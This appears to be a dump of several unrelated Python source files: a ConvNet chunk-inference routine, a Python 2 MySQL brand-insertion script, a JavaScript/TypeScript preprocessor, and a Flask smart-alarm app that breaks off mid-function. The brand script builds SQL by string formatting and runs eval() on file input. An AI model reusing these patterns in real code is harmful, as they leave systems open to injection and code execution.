output_voxel_offset = tuple(io + ocso for io, ocso in zip(
input_chunk.voxel_offset, self.output_offset))
output_buffer = Chunk(
output_buffer_array,
voxel_offset=output_voxel_offset,
voxel_size=input_chunk.voxel_size
)
return output_buffer
def __call__(self, input_chunk: Chunk):
"""
args:
input_chunk (Chunk): input chunk with voxel offset and voxel size
"""
assert isinstance(input_chunk, Chunk)
self._update_parameters_for_input_chunk(input_chunk)
output_buffer = self._get_output_buffer(input_chunk)
if not self.mask_output_chunk:
self._check_alignment()
if self.dry_run:
print('dry run, return a special artifical chunk.')
size=output_buffer.shape
if self.mask_myelin_threshold:
# eleminate the myelin channel
size = (size[0]-1, *size[1:])
return Chunk.create(
size=size,
dtype = output_buffer.dtype,
voxel_offset=output_buffer.voxel_offset,
voxel_size=input_chunk.voxel_size,
)
if input_chunk == 0:
print('input is all zero, return zero buffer directly')
if self.mask_myelin_threshold:
assert output_buffer.shape[0] == 4
return output_buffer[:-1, ...]
else:
return output_buffer
if np.issubdtype(input_chunk.dtype, np.integer):
# normalize to 0-1 value range
dtype_max = np.iinfo(input_chunk.dtype).max
input_chunk = input_chunk.astype(self.dtype)
input_chunk /= dtype_max
chunk_time_start = time.time()
# iterate the offset list
for i in tqdm(range(0, len(self.patch_slices_list), self.batch_size),
disable=(self.verbose <= 0),
desc='ConvNet inference for patches: '):
start = time.time()
batch_slices = self.patch_slices_list[i:i + self.batch_size]
for batch_idx, slices in enumerate(batch_slices):
self.input_patch_buffer[
batch_idx, 0, :, :, :] = input_chunk.cutout(slices[0]).array
end = time.time()
logging.debug('prepare %d input patches takes %3f sec' %
(self.batch_size, end - start))
start = end
# the input and output patch is a 5d numpy array with
# datatype of float32, the dimensions are batch/channel/z/y/x.
# the input image should be normalized to [0,1]
output_patch = self.patch_inferencer(self.input_patch_buffer)
end = time.time()
logging.debug('run inference for %d patch takes %3f sec' %
(self.batch_size, end - start))
start = end
for batch_idx, slices in enumerate(batch_slices):
# only use the required number of channels
# the remaining channels are dropped
# the slices[0] is for input patch slice
# the slices[1] is for output patch slice
offset = tuple(s.start for s in slices[1])
output_chunk = Chunk(
output_patch[batch_idx, :, :, :, :],
voxel_offset=offset,
voxel_size=input_chunk.voxel_size)
## save some patch for debug
#bbox = output_chunk.bbox
#if bbox.minpt[-1] < 94066 and bbox.maxpt[-1] > 94066 and \
# bbox.minpt[-2]<81545 and bbox.maxpt[-2]>81545 and \
# bbox.minpt[-3]<17298 and bbox.maxpt[-3]>17298:
# print('save patch: ', output_chunk.bbox)
# output_chunk.to_tif()
# #input_chunk.cutout(slices[0]).to_tif()
output_buffer.blend(output_chunk)
end = time.time()
logging.debug('blend patch takes %3f sec' % (end - start))
logging.debug("Inference of whole chunk takes %3f sec" %
(time.time() - chunk_time_start))
if self.mask_output_chunk:
output_buffer *= self.output_chunk_mask
# theoretically, all the value of output_buffer should not be greater than 1
# we use a slightly higher value here to accomondate numerical precision issue
np.testing.assert_array_less(output_buffer, 1.0001,
err_msg='output buffer should not be greater than 1')
if self.mask_myelin_threshold:
# currently only for masking out affinity map
assert output_buffer.shape[0] == 4
output_chunk = output_buffer.mask_using_last_channel(
threshold = self.mask_myelin_threshold)
if output_chunk.dtype == np.dtype('<f4'):
output_chunk = output_chunk.astype('float32')
return output_chunk
else:
return output_buffer
|
py | 7dfaf89d12620b1aae9eded935a6f39b8f94757a | #!/usr/bin/env/ python
# coding=utf-8
__author__ = 'Achelics'
__Date__ = '2017/05/04'
import MySQLdb
import json
from config_parser import Config
__BRAND_LIST = list()
__RAW_BRAND_LIST = list()
def __init_brand_list():
config_file = r"D:\Users\Achelics\liu_project\mutil_device_recongition\handle_brand_information\database_config.ini"
settion = "MyDataBase"
db_config = Config(config_file, settion)
url = db_config.get("url")
user = db_config.get("user")
pawd = db_config.get("pawd")
database = db_config.get("database")
try:
# open the database
db = MySQLdb.connect(url, user, pawd, database)
# Using the cursor() method to get the operate cursor.
cursor = db.cursor()
# SQL select by vulflag
sql_default = "SELECT DISTINCT(en_name) FROM iie_brand ORDER BY LENGTH(en_name) DESC"
# excute SQL sentence
cursor.execute(sql_default)
# Get the all record
default_results = cursor.fetchall()
for row in default_results:
__BRAND_LIST.append(str(row[0]).upper())
# 关闭数据库连接
db.close()
except MySQLdb.Error, e:
print("MySQL Error:%s" % str(e))
def get_brand(raw_model_name, raw_brand_name):
brand_set = set()
with open(raw_model_name, "r") as model_f:
for line in model_f:
raw_data = json.dumps(line.strip("\n"), encoding="UTF-8", ensure_ascii=False)
new_line = eval(json.loads(raw_data))
model_brand = new_line["Brand"]
brand_set.add(str(model_brand).strip())
model_f.close()
with open(raw_brand_name, "r") as brand_f:
for line in brand_f:
raw_data = json.dumps(line.strip("\n"), encoding="UTF-8", ensure_ascii=False)
new_line = eval(json.loads(raw_data))
brand_brand = new_line["Brand"]
brand_set.add(str(brand_brand).strip())
brand_f.close()
brand_upper_list = set()
for brand in brand_set:
if str(brand).upper() not in brand_upper_list:
__RAW_BRAND_LIST.append(brand)
brand_upper_list.add(str(brand).upper())
def insert_brand(product_type):
config_file = r"D:\Users\Achelics\liu_project\mutil_device_recongition\handle_brand_information\database_config.ini"
settion = "MyDataBase"
db_config = Config(config_file, settion)
url = db_config.get("url")
user = db_config.get("user")
pawd = db_config.get("pawd")
database = db_config.get("database")
try:
# open the database
conn = MySQLdb.connect(url, user, pawd, database)
# Using the cursor() method to get the operate cursor.
cursor = conn.cursor()
for brand in __RAW_BRAND_LIST:
if str(brand).strip().upper() not in __BRAND_LIST:
print brand, product_type
default_sql = "insert into iie_brand(en_name, product_type) values('%s', '%s')" % (brand, product_type)
cursor.execute(default_sql)
# 获取所有结果
conn.commit()
# 关闭指针
cursor.close()
# 关闭数据库连接
conn.close()
except MySQLdb.Error, e:
print("MySQL Error:%s" % str(e))
if __name__ == '__main__':
# raw_model_name = r"F:\mutil_result\device_tag_ll\brand_model\model.json"
# raw_brand_name = r"F:\mutil_result\device_tag_ll\brand_model\brand.json"
# product_type = "Monitor"
raw_model_name = r"F:\mutil_result\device_tag_ll\brand_model\Routermodel.json"
raw_brand_name = r"F:\mutil_result\device_tag_ll\brand_model\Routerbrand.json"
product_type = "Router"
__init_brand_list()
# print __BRAND_LIST
get_brand(raw_model_name, raw_brand_name)
# print __RAW_BRAND_LIST
insert_brand(product_type)
# print __BRAND_LIST
|
py | 7dfaf920a7af9c35bf64b822d1b2381761c102d2 | #!/usr/bin/env python
"""
A very basic JavaScript/TypeScript preprocessor.
Written by TheOnlyOne (@modest_ralts, https://github.com/LumenTheFairy).
"""
# Constants
DEFAULT_IN_DIR = "./"
DEFAULT_OUT_DIR = "./preprocessed/"
ID_CH = r'[\w$]'
import argparse
from sys import stderr
import os
from stat import S_IREAD, S_IRGRP, S_IROTH, S_IWUSR
import re
from enum import Enum, auto
# Setup logging
import logging
log = logging.getLogger('log')
formatter = logging.Formatter("[jprep: %(asctime)-15s] %(message)s")
handler = logging.StreamHandler()
handler.setFormatter(formatter)
log.addHandler(handler)
log.setLevel(logging.INFO)
LOG_VERBOSE_LEVEL_NUM = 15
logging.addLevelName(LOG_VERBOSE_LEVEL_NUM, "VERBOSE")
def log_verbose(self, message, *args, **kws):
if self.isEnabledFor(LOG_VERBOSE_LEVEL_NUM):
self._log(LOG_VERBOSE_LEVEL_NUM, message, args, **kws)
logging.Logger.verbose = log_verbose
def parseArguments():
# Create argument parser
parser = argparse.ArgumentParser(description="Preprocesses the given JavaScript/TypeScript files.")
# Positional mandatory arguments
parser.add_argument("files", nargs='+', help="list of files to preprocess")
# Optional Arguments
parser.add_argument(
"-i", "--in_dir",
default=DEFAULT_IN_DIR,
help=f'directory the input files are relative to (defaults to "{DEFAULT_IN_DIR}")'
)
parser.add_argument(
"-o", "--out_dir",
default=DEFAULT_OUT_DIR,
help=f'directory in which to write the output files (defaults to "{DEFAULT_OUT_DIR}")'
)
parser.add_argument(
"-r", "--readonly",
action="store_true",
help='preprocessed files will be saved in readonly mode, to help prevent accidental edits'
)
parser.add_argument(
"-c", "--configuration",
default=None,
help=f'configuration file which holds definitions that stay in scope for all preprocessed files'
)
parser.add_argument(
"-b", "--build_off",
action="store_true",
help="only preprocess files that can be determined to need preprocessing"
)
parser.add_argument(
"-s", "--strict_define",
action="store_true",
help="makes it an error for a define to have no value or a condition not to check against a value, or when a condition uses a value that has not been defined in the current scope"
)
parser.add_argument("--verbose", action="store_true", help="display additional information during preprocessing")
# Print version
parser.add_argument("-v", "--version", action="version", version='%(prog)s - Version 1.0')
# Parse arguments
return parser.parse_args()
EXIT_CODE = 0
def atomic_streamed_file_process(in_path, out_path, process_func):
"""Effectively reads from the file at in_path, processes it with
process_func, and writes the result to out_path. However, if process_func
fails, we don't want to leave a partially written file on disk (especially
if that means the old file has already been discarded.) Yet, we still want to
be able to stream from one file to another to keep memory usage as low as
possible. This function achieves these by creating writing the result to a
temporary file, and only if process_func succeeds, it will replace the real
output file. Otherwise, the temporary file is simply discarded.
process_func is given a file open for reading, and a file open for writing,
and is expected to return the a boolean indicating its success."""
with open(in_path, 'r') as in_file, open(out_path + '.temp', 'w') as out_file:
success = process_func(in_file, out_file)
if success:
if os.path.exists(out_path):
os.chmod(out_path, S_IWUSR|S_IREAD)
try:
os.replace(out_path + '.temp', out_path)
finally:
if args.readonly:
os.chmod(out_path, S_IREAD|S_IRGRP|S_IROTH)
else:
os.remove(out_path + '.temp')
def should_preprocess(in_path, out_path, config_path, full_build):
"""Determines if a file should be preprocessed.
A file should be preprocessed for any of the following reasons:
- We are doing a full build
- The file has never been preprocessed before
- The file has been modified since the last time it was preprocessed
- The config file has been modified since the last run
- This script has been modified since the last time it ran"""
if full_build:
return True
if not os.path.exists(out_path):
return True
if os.path.getmtime(in_path) > os.path.getmtime(out_path):
return True
if os.path.getmtime(__file__) > os.path.getmtime(out_path):
return True
if config_path and (os.path.getmtime(config_path) > os.path.getmtime(out_path)):
return True
return False
class PreprocessException(Exception):
"""An exception thrown by preprocess which indicates a parse error that should be reported"""
def __init__(self, message, local_vars):
self.message = message
self.l = local_vars
def __str__(self):
if self.l.scan == 0:
return f'{self.message}\nLine {self.l.prev_line_num}: {self.l.prev_line}'
else:
return f'{self.message}\nLine {self.l.line_num}: {self.l.in_line}'
__repr__ = __str__
class DefinitionEntry:
"""Holds the value and possible choices for a defined name"""
def __init__(self, value, choices):
self.value = value
self.choices = choices
class IfState(Enum):
If = auto()
ElseIf = auto()
Else = auto()
class IfEntry:
"""Holds info about the current if directives"""
def __init__(self, scope_depth):
self.state = IfState.If
self.seen_true = False
self.in_true = False
self.scope_depth = scope_depth
class ParsingEnvironment:
"""Holds all definitions in a stack of scopes, and keeps track of nested if directives"""
def push_scope(self):
"""Enter a new scope"""
self.scopes.append({})
def pop_scope(self, ends_branch=False):
"""Leave the current scope"""
if ((not ends_branch
and self.in_if()
and len(self.scopes) <= self.get_if_starting_scope_depth())
or len(self.scopes) <= 1):
raise PreprocessException('Attempted to leave final scope.', self.l)
self.scopes.pop()
def define(self, name, value=None, choices=None):
"""Adds or overwrites the definition of name in the current scope"""
self.scopes[-1][name] = DefinitionEntry(value, choices)
def undefine(self, name):
"""Removes a definition of name from the current scope"""
if name not in self.scopes[-1]:
raise PreprocessException(f'Cannot undefine "{name}"; it does not exist in the current scope.', self.l)
del self.scopes[-1][name]
def lookup(self, name):
"""Gets the entry for the most deeply nested definition of name, if there are any"""
for scope in reversed(self.scopes):
if name in scope:
return scope[name]
return None
def get_scope_depth(self):
return len(self.scopes)
def get_if_depth(self):
return len(self.if_stack)
def push_if(self):
"""Enter a new if directive"""
self.if_stack.append(IfEntry(len(self.scopes)))
def pop_if(self):
"""Leave the current if directive"""
self.if_stack.pop()
def in_if(self):
return bool(self.if_stack)
def set_if_branch(self, flag):
"""Set the current if directive's truthfulness"""
self.if_stack[-1].in_true = flag
self.if_stack[-1].seen_true |= flag
def set_if_state(self, state):
self.if_stack[-1].state = state
def get_if_state(self):
return self.if_stack[-1].state
def get_seen_true(self):
return self.if_stack[-1].seen_true
def get_in_true(self):
for entry in self.if_stack:
if not entry.in_true:
return False
return True
def get_if_starting_scope_depth(self):
return self.if_stack[-1].scope_depth
def __init__(self):
self.scopes = []
self.if_stack = []
self.push_scope()
self.l = None
@classmethod
def from_base_env(cls, env):
result = cls()
result.scopes = env.scopes
return result
# precompiled regexes
whitespace_re = re.compile(r'(?!\s)')
identifier_re = re.compile(ID_CH + '+' + r'(?!' + ID_CH + ')')
string_re = {}
string_re["'"] = re.compile(r"(?<!\\)'")
string_re['"'] = re.compile(r'(?<!\\)"')
end_comment_re = re.compile(r'\*/')
template_literal_re = re.compile(r'(?<!\\)`|(?<!\\)\$\{')
main_loop_re = re.compile(r'/\*\$|"|\'|//|/\*|\{|\}|`')
def same_text(s1, s2):
"""True if both strings are the same, ignoring case."""
# note, unicodedata.normalize is a good idea to get this to work all the time,
# but this is only used here to compare against our simple directive names
return s1.casefold() == s2.casefold()
def do_preprocess(in_file, out_file, env):
global EXIT_CODE
class ParseMode(Enum):
Output = auto()
Skip = auto()
# black python magic
# will make it so the print(l) prints all local variables
from itertools import chain
class Debug(type):
def __str__(self):
return '\n'.join(
['preprocess local variables:'] + [
f' {var} = {val!r}'
for (var, val)
in chain(self.__dict__.items(),
{'in_line[scan:]': self.in_line[self.scan:]}.items())
if not var.startswith('__')
])
__repr__ = __str__
# This is a bit of an ugly trick to avoid putting 'nonlocal' in any nested functions
# that only write to these (which I find easy to forget, and hard to track down; not a good combination)
class LocalVariables(metaclass=Debug):
# holds the line that was most recently read from in_file
in_line = ''
# current line number in in_file; 1 based
line_num = 0
# all characters in in_line before emit have been written to out_line or have been skipped
emit = 0
# all characters in in_line before scan have been parsed
scan = 0
# holds any partial line output. This is only written to if part of the line is skipped;
# if emit is 0 at the end of a line, in_line can be written directly to out_file
out_line = ''
# current parse mode
parse_mode = ParseMode.Output
# for error reporting...
prev_line = ''
prev_line_num = 0
l = LocalVariables
env.l = l
mode_stack = []
# holds the scope depth at each template level
template_literal_stack = []
def push_mode(mode):
mode_stack.append(l.parse_mode)
l.parse_mode = mode
def pop_mode():
l.parse_mode = mode_stack.pop()
#----------------------------------------------------------------------------------------------
# Handle input and output and line transitions
def read_line():
l.prev_line = l.in_line
l.prev_line_num = l.line_num
l.in_line = in_file.readline()
l.line_num += 1
l.emit = 0
l.scan = 0
l.out_line = ''
def write_output():
if l.emit == 0:
out_file.write(l.in_line)
else:
output = l.out_line + l.in_line[l.emit:]
if not output.isspace():
out_file.write(l.out_line + l.in_line[l.emit:])
def append_output():
l.out_line += l.in_line[l.emit:l.scan]
l.emit = l.scan
def move_to_next_line_if_necessary():
if l.scan > len(l.in_line):
raise Exception('Internal error')
if l.in_line[l.scan:] == '\n' or l.in_line[l.scan:] == '':
write_output()
read_line()
#----------------------------------------------------------------------------------------------
# Parsing utility
def parse_any(count=1):
if l.parse_mode == ParseMode.Skip:
append_output()
l.emit = l.scan + count
l.scan += count
move_to_next_line_if_necessary()
def parse_line():
if l.parse_mode == ParseMode.Skip:
l.emit = len(l.in_line) - 1
l.scan = len(l.in_line) - 1
move_to_next_line_if_necessary()
def parse_until(regex):
m = None
while not m and l.in_line:
m = regex.search(l.in_line[l.scan:])
if m:
parse_any(m.end(0))
else:
parse_line()
#----------------------------------------------------------------------------------------------
# Error reporting
def report_error(message):
raise PreprocessException(message, l)
def report_choice_inclusion_error(name, value, choices):
choices_format = ", ".join(map(lambda c: f'"{c}"', choices))
report_error(f'"{value}" is not one of the required choices for "{name}": [{choices_format}]')
#----------------------------------------------------------------------------------------------
# Parsing atoms
def try_parse_chars(s):
if l.in_line[l.scan:].startswith(s):
parse_any(len(s))
return True
return False
def parse_chars(s, error_message):
if not try_parse_chars(s):
report_error(error_message)
def try_parse_identifier():
m = identifier_re.match(l.in_line[l.scan:])
if not m:
return None
parse_any(m.end(0))
return m[0]
def parse_identifier(error_message):
result = try_parse_identifier()
if not result:
report_error(error_message)
return result
def parse_whitespace():
parse_until(whitespace_re)
def parse_string(quote):
parse_any(1)
parse_until(string_re[quote])
def parse_line_comment():
parse_line()
def parse_block_comment():
parse_until(end_comment_re)
def parse_template_literal():
parse_any(1)
parse_until(template_literal_re)
if l.in_line[l.scan-1] != '`':
template_literal_stack.append([env.get_scope_depth(), env.get_if_depth])
#----------------------------------------------------------------------------------------------
# Parsing directives
def parse_note():
parse_until(end_comment_re)
def parse_define():
name = parse_identifier('Expected a name at the beginning of the "define" directive.')
parse_whitespace()
value = None
choices = None
if try_parse_chars('='):
parse_whitespace()
value = parse_identifier('Expected a value after "=" in the "define" directive.')
parse_whitespace()
if try_parse_chars('<'):
choices = []
while True:
parse_whitespace()
choice = try_parse_identifier()
if choice:
choices.append(choice)
elif not choices:
report_error('There must be at least one choice after "<" in the "define" directive.')
parse_whitespace()
if not try_parse_chars(','):
break
parse_whitespace()
if not try_parse_chars('*/'):
report_error('Only whitespace allowed at the end of a "define" directive.')
if args.strict_define and not value:
report_error('definitions must set a value when using --strict_define')
old_definition = env.lookup(name)
if old_definition:
if old_definition.choices:
if choices:
report_error(f'"{name}" already has a set of choices.')
else:
choices = old_definition.choices
if choices:
if not value:
report_error('A value must be given for a definition with choices.')
if value not in choices:
report_choice_inclusion_error(name, value, choices)
env.define(name, value, choices)
def parse_undefine():
name = parse_identifier('Expected a name at the beginning of the "undefine" directive.')
parse_whitespace()
if not try_parse_chars('*/'):
report_error(f'Only whitespace allowed at the end of a "{directive}" directive.')
env.undefine(name)
def parse_condition(directive):
name = parse_identifier(f'Expected a name at the beginning of the "{directive}" directive.')
parse_whitespace()
value = None
if try_parse_chars('='):
parse_whitespace()
value = parse_identifier(f'Expected a value after "=" in the "{directive}" directive.')
parse_whitespace()
if not try_parse_chars('*/'):
report_error(f'Only whitespace allowed at the end of a "{directive}" directive.')
return [name, value]
def get_branch_parse_mode():
if env.get_in_true():
return ParseMode.Output
else:
return ParseMode.Skip
def parse_if():
[name, value] = parse_condition('if')
definition = env.lookup(name)
env.push_scope()
env.push_if()
if not definition:
if args.strict_define:
report_error('condition value must be defined when using --strict_define')
env.set_if_branch(False)
else:
if args.strict_define and not value:
report_error('condtion must test against a value when using --strict_define')
if definition.choices and not value in definition.choices: # False even if value is None
report_choice_inclusion_error(name, value, definition.choices)
if definition.value == value:
env.set_if_branch(True)
else:
env.set_if_branch(False)
return get_branch_parse_mode()
def parse_elseif():
if not env.in_if():
report_error('"elseif" directive outside of "if".')
if env.get_scope_depth() != env.get_if_starting_scope_depth():
report_error('if branches must have the same scopes at the start and end.')
if env.get_if_state() == IfState.Else:
report_error('"elseif" directive after "else".')
[name, value] = parse_condition('elseif')
pop_mode()
definition = env.lookup(name)
env.set_if_state(IfState.ElseIf)
env.pop_scope(True)
env.push_scope()
if not definition:
env.set_if_branch(False)
else:
if definition.choices and not value in definition.choices: # False even if value is None
report_choice_inclusion_error(name, value, definition.choices)
if env.get_seen_true():
env.set_if_branch(False)
elif definition.value == value:
env.set_if_branch(True)
else:
env.set_if_branch(False)
return get_branch_parse_mode()
def parse_else():
if not env.in_if():
report_error('"else" directive outside of "if".')
if env.get_scope_depth() != env.get_if_starting_scope_depth():
report_error('if branches must have the same scopes at the start and end.')
if env.get_if_state() == IfState.Else:
report_error('"else" directive after "else".')
parse_whitespace()
if not try_parse_chars('*/'):
report_error('Only whitespace allowed at the end of a "else" directive.')
pop_mode()
env.set_if_state(IfState.Else)
env.pop_scope(True)
env.push_scope()
env.set_if_branch(not env.get_seen_true())
return get_branch_parse_mode()
def parse_fi():
if not env.in_if():
report_error('"fi" directive outside of "if".')
if env.get_scope_depth() != env.get_if_starting_scope_depth():
report_error('if branches must have the same scopes at the start and end.')
parse_whitespace()
if not try_parse_chars('*/'):
report_error('Only whitespace allowed at the end of a "fi" directive.')
pop_mode()
env.pop_if()
env.pop_scope(True)
def parse_directive():
result = False
new_mode = None
push_mode(ParseMode.Skip)
parse_any(3)
parse_whitespace()
directive = parse_identifier('Directives must start with an identifier.')
parse_whitespace()
if same_text(directive, 'note'):
parse_note()
elif same_text(directive, 'define'):
parse_define()
elif same_text(directive, 'undefine'):
parse_undefine()
elif same_text(directive, 'if'):
new_mode = parse_if()
elif same_text(directive, 'elseif'):
new_mode = parse_elseif()
elif same_text(directive, 'else'):
new_mode = parse_else()
elif same_text(directive, 'fi'):
parse_fi()
else:
report_error(f'"{directive}"" is not a recognized directive.')
pop_mode()
if new_mode:
push_mode(new_mode)
return result
def handle_close_brace():
if template_literal_stack and (template_literal_stack[-1][0] == env.get_scope_depth()):
if env.in_if() and (env.get_if_depth != template_literal_stack[-1][1]):
report_error('Reached the end of a template expression in the middle of an if directive branch.')
template_literal_stack.pop()
parse_template_literal()
else:
env.pop_scope()
parse_any(1)
def parse_file():
while l.in_line:
m = main_loop_re.search(l.in_line[l.scan:])
if m:
parse_any(m.start(0))
if m[0] in ["'", '"']:
parse_string(l.in_line[l.scan])
elif m[0] == '`':
parse_template_literal()
elif m[0] == '//':
parse_line_comment()
elif m[0] == '/*':
parse_block_comment()
elif m[0] == '{':
env.push_scope()
parse_any(1)
elif m[0] == '}':
handle_close_brace()
elif m[0] == '/*$':
parse_directive()
else:
parse_line()
try:
read_line()
parse_file()
if env.in_if():
report_error('Reached the end of the file in the middle of an if directive branches.')
except PreprocessException as e:
log.error(e)
EXIT_CODE = -1
return False
return True
global_env = ParsingEnvironment()
def show_global_env():
return '\n'.join(
['Configuration:'] + [
f' {name} = {entry.value}'
for (name, entry)
in global_env.scopes[0].items()
])
def preprocess(in_file, out_file):
return do_preprocess(in_file, out_file, ParsingEnvironment.from_base_env(global_env))
def preprocess_config(config_path):
class NullOut():
def write(self, s):
pass
out_file = NullOut()
with open(config_path, 'r') as in_file:
return do_preprocess(in_file, out_file, global_env)
if __name__ == '__main__':
# Parse the arguments
args = parseArguments()
# Verbose flag takes effect
if args.verbose:
log.setLevel(LOG_VERBOSE_LEVEL_NUM)
log.verbose('Starting.')
# Create the output directory if it does not exist
if not os.path.exists(args.out_dir):
os.makedirs(args.out_dir)
log.verbose(f'Output directory "{args.out_dir}" created.')
# Read configuration file if there is one
if args.configuration:
preprocess_config(args.configuration)
log.verbose(show_global_env())
for filename in args.files:
in_path = os.path.join(args.in_dir, filename)
out_path = os.path.join(args.out_dir, filename)
if should_preprocess(in_path, out_path, args.configuration, not args.build_off):
atomic_streamed_file_process(in_path, out_path, preprocess)
log.verbose(f'Preprocessed "{filename}".')
else:
log.verbose(f'Skipping "{filename}"; it is already up-to-date.')
exit(EXIT_CODE)
|
py | 7dfaf9de6951c4481234645794d9bd39bf034201 | """
This module is the main module that contains the smart-alarm system.
What is does is, it extracts information from json files acquired using their corresponding APIs.
We can set alarms, read notifications and we are also able to delete them.
Functions:
hhmm_to_seconds(alarm_time) --
announce(announcement) --
title_content() --
enter_event() --
storing_alarms() --
set_default_notifications() --
news() -- we extract information from the news json, assign them to variables and return them
weather() -- we extract information from the news json, assign them to variables and return them
public_health_exeter() -- we extract information from the public health england json, assign them to variables and return them
public_health_england() -- we extract information from the public health england json, assign them to variables and return them
main_scheduler() -- this function is run in a loop by the flask module
"""
from datetime import datetime, date
import time
import sched
import logging
import json
from flask import request, Flask, render_template
import pyttsx3
from api_requests import news_request,weather_request
from api_requests import public_health_exeter_req, public_health_england_req
#initiate scheduler
s = sched.scheduler(time.time, time.sleep)
app = Flask(__name__)
#initiate text-to-speech to be used in announcements
engine = pyttsx3.init()
#date and time will be used to check for invalid alarms set
now = datetime.now()
current_time = now.strftime("%H:%M:%S")
# Get today's date
today = date.today()
#convert the time interval between the alarm and the current time into seconds
def hhmm_to_seconds(alarm_time: str) -> int:
"Convert time argument and current time into seconds, then return the delay time."
split_hhmm = list(alarm_time.split(':'))
hours_to_secs = int(split_hhmm[0]) * 3600
mins_to_secs = int(split_hhmm[1]) * 60
secs = int(split_hhmm[2])
hhmm_to_secs = hours_to_secs + mins_to_secs + secs
logging.info("alarm time delay calculated")
return hhmm_to_secs
#this will enable text-to-speech to read the announcements out loud
def announce(announcement:str):
"Enable text-to-speech, and use it in the announcement."
try:
engine.endLoop()
except:
logging.error('PyTTSx3 Endloop error')
engine.say(announcement)
engine.runAndWait()
#this will regularly update the notifications and alarms
def title_content() -> list:
"Assign title and content to alarms and notifications."
#appends updated alarms json file so that it is displayed in the html
alarms = []
with open("json_files/alarms.json","r") as file:
alarms_file = json.load(file, strict=False)
file.close()
value_counter = 0
alarms_in_json = alarms_file["data"]
for key in list(alarms_in_json.keys()):
time = list(alarms_in_json.values())[value_counter].replace("T", " ")
alarms.append({"title": "ALARM LABEL: "+key,"content":"ALARM SET: "+time})
value_counter = value_counter + 1
now = datetime.now()
if int(now.minute) == 0 :
logging.info("default notifications set")
notifications = set_default_notifications()
return notifications, alarms
#if the alarm is set for today it will enter it in the scheduler
def enter_event():
"Enter alarm in the scheduler."
#alarms = title_content()
notifs = set_default_notifications()
notifs = notifs[3]["content"]
#convert alarm_time to a delay
delay = hhmm_to_seconds(ALARM_SPLIT_TIME) - hhmm_to_seconds(current_time)
s.enter(int(delay), 1, announce, ["COVID RATES IN EXETER "+notifs,])
logging.info("alarm set")
#<<<COME BACK TO THIS LATER!!!: cancelling events>>>-------------------------------------------
#with open("json_files/events.json","r") as f:
#events_file = json.load(f)
#f.close()
#adds new alarm
#events_file[alarm_text] = "why"
#with open("json_files/events.json","w") as updated_file:
#json.dump(events_file, updated_file, indent=2)
#updated_file.close()
#this will store and remove alarms from the alarms.json file
def storing_alarms():
"Store alarm in alarms json file to enable to add/remove alarms."
global ALARM_SPLIT_TIME, ALARM_TEXT
alarm_time = request.args.get("alarm")
ALARM_TEXT = request.args.get("two")
if alarm_time:
alarm_split_date_time = alarm_time.split("T")
alarm_split_date = str(alarm_split_date_time[0])
ALARM_SPLIT_TIME = str(alarm_split_date_time[1]) + ":00"
year = int(alarm_split_date[:4])
month = int(alarm_split_date[5:7])
day = int(alarm_split_date[-2:])
with open("json_files/alarms.json","r") as file:
alarms_file = json.load(file, strict=False)
file.close()
#check if the alarm time set has passed
if datetime(year,month,day,int(ALARM_SPLIT_TIME[:2]),int(ALARM_SPLIT_TIME[-5:-3])) < now:
logging.error("Alarm time set has passed")
#if the alarm set is for today enter in the scheduler
elif alarm_split_date == str(today):
enter_event()
if ALARM_TEXT in list(alarms_file["data"].keys()):
#counter used to access the corresponding value of the key
x_counter=1
#if the labels are duplicated, just add a number in the label
while ALARM_TEXT in list(alarms_file["data"].keys()):
x_counter = x_counter+1
ALARM_TEXT = ALARM_TEXT+str(x_counter)
logging.info("existing label detected")
if datetime(year,month,day,int(ALARM_SPLIT_TIME[:2]),int(ALARM_SPLIT_TIME[-5:-3])) >= now:
#adds new alarm
alarms_file["data"][ALARM_TEXT] = alarm_time
#updates alarms_json
with open("json_files/alarms.json","w") as updated_file:
json.dump(alarms_file, updated_file, indent=2)
updated_file.close()
def set_default_notifications():
"Set the notifications to default notifications."
#extract inormation from corresponding json files
title1, content1, title2, content2 = news()
weather_city, weather_temp, weather_des, weather_pre, weather_hum = weather()
date1, area_name1, new_cases1, cumulative_cases1 = public_health_exeter()
date2, area_name2, new_cases2, cumulative_cases2 = public_health_england()
weather_city = str(weather_temp)
weather_pre = str(weather_pre)
weather_hum = str(weather_hum)
#assign the extracted information from APIs to variables
title1 = "NEWS: "+title1
title2 = "NEWS: "+title2
title3 = "WEATHER (right now) : "+weather_city
title4 = "PUBLIC HEALTH ENGLAND--YESTERDAY'S COVID-19 RATES: {area}".format(area=area_name1)
title5 = "PUBLIC HEALTH ENGLAND--YESTERDAY'S COVID-19 RATES: {area}".format(area=area_name2)
content3_1 = "TEMPERATURE(Kelvin): {temp}, DESCRIPTION: {des},"
content3_2 = " PRESSURE(hPa): {pre}, HUMIDITY(%): {hum}"
content3 = content3_1+content3_2
cont3 = content3.format(temp=weather_temp, des=weather_des, pre=weather_pre, hum=weather_hum)
content4_1 = "DATE: {date1}, NEW CASES: {new_cases1}, CUMULATIVE CASES: {cum_cases1}"
content4 = content4_1.format(date1=date1, new_cases1=new_cases1, cum_cases1=cumulative_cases1)
content4_1 = "DATE: {date2}, NEW CASES: {new_cases2}, CUMULATIVE CASES: {cum_cases2}"
content5 = content4_1.format(date2=date2, new_cases2=new_cases2, cum_cases2=cumulative_cases2)
#notifications data structure
notifications = [{"title" : title1,"content" : content1},
{"title" : title2,"content" : content2},
{"title" : title3,"content" : cont3},
{"title" : title4,"content" : content4},
{"title" : title5,"content" : content5}]
return notifications
#announcements section---------
def news():
"Extract covid related information from the news json file."
news_request()
covid_words = ['covid','lockdown',"coronavirus","covid-19"]
covid_filter ={"articles":[]}
with open('json_files/news_json.json', 'r') as file:
news_json = json.load(file, strict=False)
articles = news_json["articles"]
for article in articles:
for word in covid_words:
if word in article['title'].lower():
if {"title":article['title'], "content":article["description"]} not in covid_filter["articles"]:
covid_filter["articles"].append({"title":article['title'], "content":article["description"]})
with open('json_files/news_notifs.json', 'w') as file:
json.dump(covid_filter, file, indent=2)
file.close()
title1 = covid_filter["articles"][0]["title"]
content1 = covid_filter["articles"][0]["content"]
title2 = covid_filter["articles"][1]["title"]
content2 = covid_filter["articles"][1]["content"]
logging.info("news extracted")
return title1, content1, title2, content2
def weather():
"Extract weather information from weather json file."
weather_request()
with open('json_files/weather_json.json', 'r') as file:
weather_file = json.load(file, strict=False)
if weather_file["cod"] != "404":
city = weather_file["name"]
temperature = weather_file["main"]["temp"]
description = weather_file["weather"][0]["description"]
pressure = weather_file["main"]["pressure"]
humidity = weather_file["main"]["humidity"]
file.close()
logging.info("weather extracted")
return city, temperature, description, pressure, humidity
def public_health_exeter():
